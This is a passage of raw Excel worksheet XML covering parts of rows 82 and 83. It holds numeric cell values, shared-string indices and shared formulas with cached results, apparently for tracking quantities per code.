      <c r="CJ82" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK82" s="104">
        <v>0.0</v>
      </c>
      <c r="CL82" s="104">
        <v>0.0</v>
      </c>
      <c r="CM82" s="105">
        <v>100.0</v>
      </c>
      <c r="CN82" s="105">
        <v>100.0</v>
      </c>
      <c r="CO82" s="105">
        <v>5083.0</v>
      </c>
      <c r="CP82" s="105">
        <v>5278.0</v>
      </c>
      <c r="CQ82" s="105">
        <v>0.0</v>
      </c>
      <c r="CR82" s="105">
        <v>5278.0</v>
      </c>
      <c r="CS82" s="105">
        <v>0.0</v>
      </c>
      <c r="CT82" s="105">
        <v>0.0</v>
      </c>
      <c r="CU82" s="105">
        <v>0.0</v>
      </c>
      <c r="CV82" s="105">
        <v>0.0</v>
      </c>
      <c r="CW82" s="105">
        <v>100.0</v>
      </c>
      <c r="CX82" s="105">
        <v>5083.0</v>
      </c>
      <c r="CY82" s="105">
        <v>5278.0</v>
      </c>
      <c r="CZ82" s="105">
        <v>0.0</v>
      </c>
      <c r="DA82" s="105">
        <v>5278.0</v>
      </c>
      <c r="DB82" s="106">
        <f t="shared" si="122"/>
        <v>100</v>
      </c>
      <c r="DC82" s="106">
        <f t="shared" si="123"/>
        <v>100</v>
      </c>
      <c r="DD82" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE82" s="106">
        <f t="shared" si="125"/>
        <v>5083</v>
      </c>
      <c r="DF82" s="106">
        <f t="shared" si="126"/>
        <v>5083</v>
      </c>
      <c r="DG82" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH82" s="106">
        <f t="shared" si="127"/>
        <v>5278</v>
      </c>
      <c r="DI82" s="106">
        <f t="shared" si="128"/>
        <v>5278</v>
      </c>
      <c r="DJ82" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK82" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL82" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM82" s="108">
        <v>402.0</v>
      </c>
      <c r="DN82" s="108">
        <v>1.0</v>
      </c>
      <c r="DO82" s="108">
        <v>5278.0</v>
      </c>
      <c r="DP82" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ82" s="108">
        <v>402.0</v>
      </c>
      <c r="DR82" s="108">
        <v>1.0</v>
      </c>
      <c r="DS82" s="108">
        <v>5278.0</v>
      </c>
      <c r="DT82" s="108">
        <v>402.0</v>
      </c>
      <c r="DU82" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV82" s="108">
        <f t="shared" si="154"/>
        <v>402</v>
      </c>
      <c r="DW82" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX82" s="108">
        <v>402.0</v>
      </c>
      <c r="DY82" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ82" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA82" s="108">
        <v>0.0</v>
      </c>
      <c r="EB82" s="108">
        <v>0.0</v>
      </c>
      <c r="EC82" s="109">
        <v>110.0</v>
      </c>
      <c r="ED82" s="109">
        <v>100.0</v>
      </c>
      <c r="EE82" s="109">
        <v>5083.0</v>
      </c>
      <c r="EF82" s="109">
        <v>5278.0</v>
      </c>
      <c r="EG82" s="109">
        <v>0.0</v>
      </c>
      <c r="EH82" s="109">
        <v>5278.0</v>
      </c>
      <c r="EI82" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ82" s="109">
        <v>0.0</v>
      </c>
      <c r="EK82" s="109">
        <v>0.0</v>
      </c>
      <c r="EL82" s="109">
        <v>0.0</v>
      </c>
      <c r="EM82" s="109">
        <v>100.0</v>
      </c>
      <c r="EN82" s="109">
        <v>5083.0</v>
      </c>
      <c r="EO82" s="109">
        <v>5278.0</v>
      </c>
      <c r="EP82" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ82" s="109">
        <v>5278.0</v>
      </c>
      <c r="ER82" s="110">
        <f t="shared" si="130"/>
        <v>100</v>
      </c>
      <c r="ES82" s="110">
        <f t="shared" si="131"/>
        <v>100</v>
      </c>
      <c r="ET82" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU82" s="110">
        <f t="shared" si="133"/>
        <v>5083</v>
      </c>
      <c r="EV82" s="110">
        <f t="shared" si="134"/>
        <v>5083</v>
      </c>
      <c r="EW82" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX82" s="110">
        <f t="shared" si="136"/>
        <v>5278</v>
      </c>
      <c r="EY82" s="110">
        <f t="shared" si="137"/>
        <v>5278</v>
      </c>
      <c r="EZ82" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA82" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB82" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC82" s="111" t="s">
        <v>1505</v>
      </c>
      <c r="FD82" s="111">
        <v>4.0</v>
      </c>
      <c r="FE82" s="111">
        <v>10580.0</v>
      </c>
      <c r="FF82" s="101" t="s">
        <v>1506</v>
      </c>
      <c r="FG82" s="111">
        <v>402.0</v>
      </c>
      <c r="FH82" s="111">
        <v>1.0</v>
      </c>
      <c r="FI82" s="111">
        <v>5278.0</v>
      </c>
      <c r="FJ82" s="111" t="s">
        <v>1505</v>
      </c>
      <c r="FK82" s="111" t="s">
        <v>1506</v>
      </c>
      <c r="FL82" s="111" t="str">
        <f t="shared" si="155"/>
        <v>402, 2002749, 2100402, 2002752</v>
      </c>
      <c r="FM82" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN82" s="111" t="s">
        <v>1507</v>
      </c>
      <c r="FO82" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP82" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ82" s="111">
        <v>0.0</v>
      </c>
      <c r="FR82" s="111">
        <v>0.0</v>
      </c>
      <c r="FS82" s="112">
        <v>100.0</v>
      </c>
      <c r="FT82" s="112">
        <v>100.0</v>
      </c>
      <c r="FU82" s="112">
        <v>5102.0</v>
      </c>
      <c r="FV82" s="112">
        <v>5278.0</v>
      </c>
      <c r="FW82" s="112">
        <v>5302.0</v>
      </c>
      <c r="FX82" s="112">
        <v>5302.0</v>
      </c>
      <c r="FY82" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ82" s="112">
        <v>0.0</v>
      </c>
      <c r="GA82" s="112">
        <v>0.0</v>
      </c>
      <c r="GB82" s="112">
        <v>0.0</v>
      </c>
      <c r="GC82" s="112">
        <v>100.0</v>
      </c>
      <c r="GD82" s="112">
        <v>5083.0</v>
      </c>
      <c r="GE82" s="112">
        <v>5278.0</v>
      </c>
      <c r="GF82" s="112">
        <v>0.0</v>
      </c>
      <c r="GG82" s="112">
        <v>5278.0</v>
      </c>
      <c r="GH82" s="113">
        <f t="shared" si="139"/>
        <v>100</v>
      </c>
      <c r="GI82" s="113">
        <f t="shared" si="140"/>
        <v>100</v>
      </c>
      <c r="GJ82" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK82" s="113">
        <f t="shared" si="142"/>
        <v>5102</v>
      </c>
      <c r="GL82" s="113">
        <f t="shared" si="143"/>
        <v>5083</v>
      </c>
      <c r="GM82" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN82" s="113">
        <f t="shared" si="145"/>
        <v>5302</v>
      </c>
      <c r="GO82" s="113">
        <f t="shared" si="146"/>
        <v>5278</v>
      </c>
      <c r="GP82" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ82" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR82" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS82" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT82" s="94" t="s">
        <v>1508</v>
      </c>
      <c r="GU82" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV82" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW82" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX82" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY82" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ82" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA82" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB82" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC82" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD82" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE82" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF82" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG82" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH82" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI82" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ82" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK82" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL82" s="93">
        <v>52733.0</v>
      </c>
      <c r="HM82" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN82" s="93">
        <v>0.0</v>
      </c>
      <c r="HO82" s="93">
        <v>0.0</v>
      </c>
      <c r="HP82" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ82" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR82" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS82" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT82" s="139"/>
      <c r="HU82" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV82" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW82" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX82" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY82" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ82" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA82" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB82" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC82" s="120" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="ID82" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE82" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF82" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG82" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH82" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II82" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ82" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK82" s="99">
        <v>100.0</v>
      </c>
      <c r="IL82" s="99">
        <v>0.0</v>
      </c>
      <c r="IM82" s="121">
        <f t="shared" si="97"/>
        <v>0</v>
      </c>
      <c r="IN82" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO82" s="98">
        <v>0.0</v>
      </c>
      <c r="IP82" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ82" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR82" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS82" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT82" s="127"/>
      <c r="IU82" s="127"/>
      <c r="IV82" s="127"/>
      <c r="IW82" s="127"/>
      <c r="IX82" s="127"/>
      <c r="IY82" s="127"/>
      <c r="IZ82" s="127"/>
      <c r="JA82" s="127"/>
      <c r="JB82" s="127"/>
      <c r="JC82" s="127"/>
      <c r="JD82" s="127"/>
      <c r="JE82" s="127"/>
      <c r="JF82" s="127"/>
      <c r="JG82" s="127"/>
      <c r="JH82" s="127"/>
      <c r="JI82" s="127"/>
      <c r="JJ82" s="127"/>
      <c r="JK82" s="127"/>
      <c r="JL82" s="127"/>
      <c r="JM82" s="127"/>
      <c r="JN82" s="127"/>
      <c r="JO82" s="127"/>
      <c r="JP82" s="127"/>
      <c r="JQ82" s="127"/>
      <c r="JR82" s="127"/>
      <c r="JS82" s="127"/>
      <c r="JT82" s="127"/>
      <c r="JU82" s="127"/>
      <c r="JV82" s="127"/>
      <c r="JW82" s="127"/>
      <c r="JX82" s="127"/>
      <c r="JY82" s="127"/>
      <c r="JZ82" s="127"/>
      <c r="KA82" s="127"/>
      <c r="KB82" s="127"/>
      <c r="KC82" s="127"/>
      <c r="KD82" s="127"/>
      <c r="KE82" s="127"/>
      <c r="KF82" s="127"/>
      <c r="KG82" s="127"/>
      <c r="KH82" s="127"/>
      <c r="KI82" s="127"/>
      <c r="KJ82" s="127"/>
      <c r="KK82" s="127"/>
      <c r="KL82" s="127"/>
      <c r="KM82" s="127"/>
      <c r="KN82" s="127"/>
      <c r="KO82" s="127"/>
      <c r="KP82" s="127"/>
      <c r="KQ82" s="127"/>
      <c r="KR82" s="127"/>
      <c r="KS82" s="127"/>
      <c r="KT82" s="127"/>
      <c r="KU82" s="127"/>
      <c r="KV82" s="127"/>
      <c r="KW82" s="127"/>
      <c r="KX82" s="127"/>
      <c r="KY82" s="127"/>
      <c r="KZ82" s="127"/>
      <c r="LA82" s="127"/>
      <c r="LB82" s="127"/>
      <c r="LC82" s="127"/>
      <c r="LD82" s="127"/>
      <c r="LE82" s="127"/>
      <c r="LF82" s="127"/>
      <c r="LG82" s="127"/>
      <c r="LH82" s="127"/>
      <c r="LI82" s="127"/>
      <c r="LJ82" s="127"/>
      <c r="LK82" s="127"/>
      <c r="LL82" s="127"/>
      <c r="LM82" s="127"/>
      <c r="LN82" s="127"/>
      <c r="LO82" s="127"/>
      <c r="LP82" s="127"/>
      <c r="LQ82" s="127"/>
      <c r="LR82" s="127"/>
      <c r="LS82" s="127"/>
      <c r="LT82" s="127"/>
      <c r="LU82" s="127"/>
      <c r="LV82" s="127"/>
      <c r="LW82" s="127"/>
      <c r="LX82" s="127"/>
      <c r="LY82" s="127"/>
      <c r="LZ82" s="127"/>
      <c r="MA82" s="127"/>
      <c r="MB82" s="127"/>
      <c r="MC82" s="127"/>
      <c r="MD82" s="127"/>
      <c r="ME82" s="127"/>
      <c r="MF82" s="127"/>
      <c r="MG82" s="127"/>
      <c r="MH82" s="127"/>
      <c r="MI82" s="127"/>
      <c r="MJ82" s="127"/>
      <c r="MK82" s="127"/>
      <c r="ML82" s="127"/>
      <c r="MM82" s="127"/>
      <c r="MN82" s="127"/>
      <c r="MO82" s="127"/>
      <c r="MP82" s="127"/>
      <c r="MQ82" s="127"/>
      <c r="MR82" s="127"/>
      <c r="MS82" s="127"/>
      <c r="MT82" s="127"/>
      <c r="MU82" s="127"/>
      <c r="MV82" s="127"/>
      <c r="MW82" s="127"/>
      <c r="MX82" s="127"/>
      <c r="MY82" s="127"/>
      <c r="MZ82" s="127"/>
      <c r="NA82" s="127"/>
      <c r="NB82" s="127"/>
      <c r="NC82" s="127"/>
      <c r="ND82" s="127"/>
      <c r="NE82" s="127"/>
      <c r="NF82" s="127"/>
      <c r="NG82" s="127"/>
      <c r="NH82" s="127"/>
      <c r="NI82" s="127"/>
      <c r="NJ82" s="127"/>
      <c r="NK82" s="127"/>
      <c r="NL82" s="127"/>
      <c r="NM82" s="127"/>
      <c r="NN82" s="127"/>
      <c r="NO82" s="127"/>
      <c r="NP82" s="127"/>
      <c r="NQ82" s="127"/>
      <c r="NR82" s="127"/>
      <c r="NS82" s="127"/>
      <c r="NT82" s="127"/>
      <c r="NU82" s="127"/>
      <c r="NV82" s="127"/>
      <c r="NW82" s="127"/>
      <c r="NX82" s="127"/>
      <c r="NY82" s="127"/>
    </row>
    <row r="83" ht="153.75" customHeight="1">
      <c r="B83" s="89" t="s">
        <v>1373</v>
      </c>
      <c r="C83" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D83" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E83" s="90" t="s">
        <v>1411</v>
      </c>
      <c r="F83" s="90" t="s">
        <v>1412</v>
      </c>
      <c r="G83" s="91" t="s">
        <v>1461</v>
      </c>
      <c r="H83" s="90" t="s">
        <v>1462</v>
      </c>
      <c r="I83" s="92" t="s">
        <v>1494</v>
      </c>
      <c r="J83" s="92" t="s">
        <v>508</v>
      </c>
      <c r="K83" s="92" t="s">
        <v>1509</v>
      </c>
      <c r="L83" s="93" t="s">
        <v>1311</v>
      </c>
      <c r="M83" s="93">
        <v>1.0</v>
      </c>
      <c r="N83" s="93">
        <v>1.0</v>
      </c>
      <c r="O83" s="93">
        <v>0.0</v>
      </c>
      <c r="P83" s="93">
        <v>1.0</v>
      </c>
      <c r="Q83" s="93">
        <v>1.0</v>
      </c>
      <c r="R83" s="93">
        <v>1.0</v>
      </c>
      <c r="S83" s="93">
        <v>0.0</v>
      </c>
      <c r="T83" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U83" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V83" s="96" t="s">
        <v>1497</v>
      </c>
      <c r="W83" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X83" s="97" t="s">
        <v>512</v>
      </c>
      <c r="Y83" s="126" t="s">
        <v>1504</v>
      </c>
      <c r="Z83" s="126" t="s">
        <v>1467</v>
      </c>
      <c r="AA83" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB83" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC83" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD83" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE83" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF83" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG83" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH83" s="99" t="s">
        <v>1440</v>
      </c>
      <c r="AI83" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ83" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK83" s="100">
        <v>402.0</v>
      </c>
      <c r="AL83" s="100">
        <v>1.0</v>
      </c>
      <c r="AM83" s="100">
        <v>4856.0</v>
      </c>
      <c r="AN83" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO83" s="100">
        <v>402.0</v>
      </c>
      <c r="AP83" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ83" s="100">
        <v>4856.0</v>
      </c>
      <c r="AR83" s="100">
        <v>402.0</v>
      </c>
      <c r="AS83" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT83" s="100">
        <f t="shared" si="149"/>
        <v>402</v>
      </c>
      <c r="AU83" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV83" s="100">
        <v>402.0</v>
      </c>
      <c r="AW83" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX83" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY83" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ83" s="100">
        <v>0.0</v>
      </c>
      <c r="BA83" s="102">
        <v>110.0</v>
      </c>
      <c r="BB83" s="102">
        <v>0.0</v>
      </c>
      <c r="BC83" s="102">
        <v>0.0</v>
      </c>
      <c r="BD83" s="102">
        <v>0.0</v>
      </c>
      <c r="BE83" s="102">
        <v>0.0</v>
      </c>
      <c r="BF83" s="102">
        <v>0.0</v>
      </c>
      <c r="BG83" s="102">
        <v>0.0</v>
      </c>
      <c r="BH83" s="102">
        <v>0.0</v>
      </c>
      <c r="BI83" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ83" s="102">
        <v>0.0</v>
      </c>
      <c r="BK83" s="102">
        <v>0.0</v>
      </c>
      <c r="BL83" s="103">
        <f t="shared" si="112"/>
        <v>0</v>
      </c>
      <c r="BM83" s="103">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="BN83" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO83" s="103">
        <f t="shared" si="115"/>
        <v>0</v>
      </c>
      <c r="BP83" s="103">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BQ83" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR83" s="103">
        <f t="shared" si="118"/>
        <v>0</v>
      </c>
      <c r="BS83" s="103">
        <f t="shared" si="119"/>
        <v>0</v>
      </c>
      <c r="BT83" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU83" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV83" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW83" s="104">
        <v>402.0</v>
      </c>
      <c r="BX83" s="104">
        <v>1.0</v>
      </c>
      <c r="BY83" s="104">
        <v>4856.0</v>
      </c>
      <c r="BZ83" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA83" s="104">
        <v>402.0</v>
      </c>
      <c r="CB83" s="104">
        <v>1.0</v>
      </c>
      <c r="CC83" s="104">
        <v>4856.0</v>
      </c>
      <c r="CD83" s="104">
        <v>402.0</v>
      </c>
      <c r="CE83" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF83" s="104">
        <f t="shared" si="153"/>
        <v>402</v>
      </c>
      <c r="CG83" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH83" s="104">
        <v>402.0</v>
      </c>
      <c r="CI83" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ83" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK83" s="104">
        <v>0.0</v>
      </c>
      <c r="CL83" s="104">
        <v>0.0</v>
      </c>
      <c r="CM83" s="105">
        <v>100.0</v>
      </c>
      <c r="CN83" s="105">
        <v>0.0</v>
      </c>
      <c r="CO83" s="105">
        <v>0.0</v>
      </c>
      <c r="CP83" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ83" s="105">
        <v>0.0</v>
      </c>
      <c r="CR83" s="105">
        <v>0.0</v>
      </c>
      <c r="CS83" s="105">
        <v>0.0</v>
      </c>
      <c r="CT83" s="105">
        <v>0.0</v>
      </c>
      <c r="CU83" s="105">
        <v>0.0</v>
      </c>
      <c r="CV83" s="105">
        <v>0.0</v>
      </c>
      <c r="CW83" s="105">
        <v>0.0</v>
      </c>
      <c r="CX83" s="105">
        <v>0.0</v>
      </c>
      <c r="CY83" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ83" s="105">
        <v>0.0</v>
      </c>
      <c r="DA83" s="105">
        <v>0.0</v>
      </c>
      <c r="DB83" s="106">
        <f t="shared" si="122"/>
        <v>0</v>
      </c>
      <c r="DC83" s="106">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="DD83" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE83" s="106">
        <f t="shared" si="125"/>
        <v>0</v>
      </c>
      <c r="DF83" s="106">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="DG83" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH83" s="106">
        <f t="shared" si="127"/>
        <v>0</v>
      </c>
      <c r="DI83" s="106">
        <f t="shared" si="128"/>
        <v>0</v>
      </c>
      <c r="DJ83" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK83" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL83" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM83" s="108">
        <v>402.0</v>
      </c>
      <c r="DN83" s="108">
        <v>1.0</v>
      </c>
      <c r="DO83" s="108">
        <v>4856.0</v>
      </c>
      <c r="DP83" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ83" s="108">
        <v>402.0</v>
      </c>
      <c r="DR83" s="108">
        <v>1.0</v>
      </c>
      <c r="DS83" s="108">
        <v>4856.0</v>
      </c>
      <c r="DT83" s="108">
        <v>402.0</v>
      </c>
      <c r="DU83" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV83" s="108">
        <f t="shared" si="154"/>
        <v>402</v>
      </c>
      <c r="DW83" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX83" s="108">
        <v>402.0</v>
      </c>
      <c r="DY83" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ83" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA83" s="108">
        <v>0.0</v>
      </c>
      <c r="EB83" s="108">
        <v>0.0</v>
      </c>
      <c r="EC83" s="109">
        <v>110.0</v>
      </c>
      <c r="ED83" s="109">
        <v>0.0</v>
      </c>
      <c r="EE83" s="109">
        <v>1.0</v>
      </c>
      <c r="EF83" s="109">
        <v>76.0</v>
      </c>
      <c r="EG83" s="109">
        <v>0.0</v>
      </c>
      <c r="EH83" s="109">
        <v>76.0</v>
      </c>
      <c r="EI83" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ83" s="109">
        <v>0.0</v>
      </c>
      <c r="EK83" s="109">
        <v>0.0</v>
      </c>
      <c r="EL83" s="109">
        <v>0.0</v>
      </c>
      <c r="EM83" s="109">
        <v>0.0</v>
      </c>
      <c r="EN83" s="109">
        <v>1.0</v>
      </c>
      <c r="EO83" s="109">
        <v>76.0</v>
      </c>
      <c r="EP83" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ83" s="109">
        <v>76.0</v>
      </c>
      <c r="ER83" s="110">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="ES83" s="110">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="ET83" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU83" s="110">
        <f t="shared" si="133"/>
        <v>1</v>
      </c>
      <c r="EV83" s="110">
        <f t="shared" si="134"/>
        <v>1</v>
      </c>
      <c r="EW83" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX83" s="110">
        <f t="shared" si="136"/>
        <v>76</v>
      </c>
      <c r="EY83" s="110">
        <f t="shared" si="137"/>
        <v>76</v>
      </c>
      <c r="EZ83" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA83" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB83" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC83" s="111" t="s">
        <v>1507</v>
      </c>
      <c r="FD83" s="111">
        <v>4.0</v>
      </c>
      <c r="FE83" s="111">
        <v>9736.0</v>
      </c>
      <c r="FF83" s="101" t="s">
        <v>1506</v>
      </c>
      <c r="FG83" s="111">
        <v>402.0</v>
      </c>
      <c r="FH83" s="111">
        <v>1.0</v>
      </c>
      <c r="FI83" s="111">
        <v>4856.0</v>
      </c>
      <c r="FJ83" s="111" t="s">
        <v>1507</v>
      </c>
      <c r="FK83" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL83" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2002749, 2002752, 2100402, 402</v>
      </c>
      <c r="FM83" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN83" s="111" t="s">
        <v>1507</v>
      </c>
      <c r="FO83" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP83" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ83" s="111">
        <v>0.0</v>
      </c>
      <c r="FR83" s="111">
        <v>0.0</v>
      </c>
      <c r="FS83" s="112">
        <v>100.0</v>
      </c>
      <c r="FT83" s="112">
        <v>37.0</v>
      </c>
      <c r="FU83" s="112">
        <v>38.0</v>
      </c>
      <c r="FV83" s="112">
        <v>76.0</v>
      </c>
      <c r="FW83" s="112">
        <v>40.0</v>
      </c>
      <c r="FX83" s="112">
        <v>116.0</v>
      </c>
      <c r="FY83" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ83" s="112">
        <v>0.0</v>
      </c>
      <c r="GA83" s="112">
        <v>0.0</v>
      </c>
      <c r="GB83" s="112">
        <v>0.0</v>
      </c>
      <c r="GC83" s="112">
        <v>0.0</v>
      </c>
      <c r="GD83" s="112">
        <v>1.0</v>
      </c>
      <c r="GE83" s="112">
        <v>76.0</v>
      </c>
      <c r="GF83" s="112">
        <v>0.0</v>
      </c>
      <c r="GG83" s="112">
        <v>76.0</v>
      </c>
      <c r="GH83" s="113">
        <f t="shared" si="139"/>
        <v>37</v>
      </c>
      <c r="GI83" s="113">
        <f t="shared" si="140"/>
        <v>0</v>
      </c>
      <c r="GJ83" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK83" s="113">
        <f t="shared" si="142"/>
        <v>38</v>
      </c>
      <c r="GL83" s="113">
        <f t="shared" si="143"/>
        <v>1</v>
      </c>
      <c r="GM83" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN83" s="113">
        <f t="shared" si="145"/>
        <v>116</v>
      </c>
      <c r="GO83" s="113">
        <f t="shared" si="146"/>
        <v>76</v>
      </c>
      <c r="GP83" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ83" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR83" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS83" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT83" s="94"/>
      <c r="GU83" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV83" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW83" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX83" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY83" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ83" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA83" s="117" t="s">
        <v>12</v>
      </c>
